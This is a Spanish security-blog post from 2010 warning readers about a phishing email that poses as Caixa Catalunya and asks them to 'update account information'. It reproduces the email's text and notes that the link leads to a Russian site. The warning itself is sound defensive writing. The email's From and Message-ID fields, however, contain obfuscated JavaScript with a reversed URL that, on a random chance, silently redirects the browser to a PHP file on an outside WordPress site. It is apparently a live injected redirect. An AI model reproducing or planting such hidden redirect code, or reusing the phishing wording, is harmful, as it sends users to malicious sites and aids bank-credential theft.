Un nuevo falso mail, que esta vez aparenta venir de “Caixa Catalunya”

Publicado el 2 septiembre 2010 ¬ 16:51 pmh.mscComentarios desactivados en Un nuevo falso mail, que esta vez aparenta venir de “Caixa Catalunya”

Se está recibiendo un falso mail con estas caracteristicas:

__________________
From:  Caixa Catalunya <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:versusuo28@rhovyl.com”>versusuo28@rhovyl.com
X-Priority:  3 (Normal)
Message-ID:  <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:snpicy@%3Cdominio”>snpicy@<dominio destinatario>
Subject:  actualizar la informacion de su cuenta
MIME-Version:  1.0

 

Estimado cliente,

Ha llegado a nuestra atención que de su Caixa Catalunya cuenta las necesidades de información que se actualizará como parte de nuestro continuo compromiso para proteger su cuenta y para reducir los casos de fraude en nuestra página web. Si por favor pueden tomar 5-10 minutos fuera de su experiencia en línea y actualizar sus registros personales, no se publicarán en el futuro problemas con el servicio online.

Sin embargo, el hecho de no actualizar sus registros se traducirá en cuenta la suspensión.

Una vez que haya actualizado los registros de su cuenta, su cuenta de Caixa Catalunya actividad no será interrumpida y continuará con normalidad.

Haga clic aquí para actualizar la información de su cuenta   <—  link malicioso que redirije a una IP de dominio italiano ???  http://chilp.it/<interceptado>, pero lleva a una web rusa que intercepta el SiteAdvisor de McAfee

Nota: Este e-mail es generado de manera automatica, por favor no responda a este mensaje.

Copyright © Caixa d’Estalvis de Catalunya, Tarragona y Manresa todos los derechos reservados.
___________________
Si bien la redacción ya duele a los ojos, al pulsar en el link (lo cual NO DEBE HACERSE) se accede realmente a una web rusa, que el Site Advisor de McAfee intercepta:
imagen virtdcru.jpg

 

Está claro que es otra variante de cazapasswords bancario que conviene evitar … !!!

saludos

ms, 2-9-2010

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Banker, Spam,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies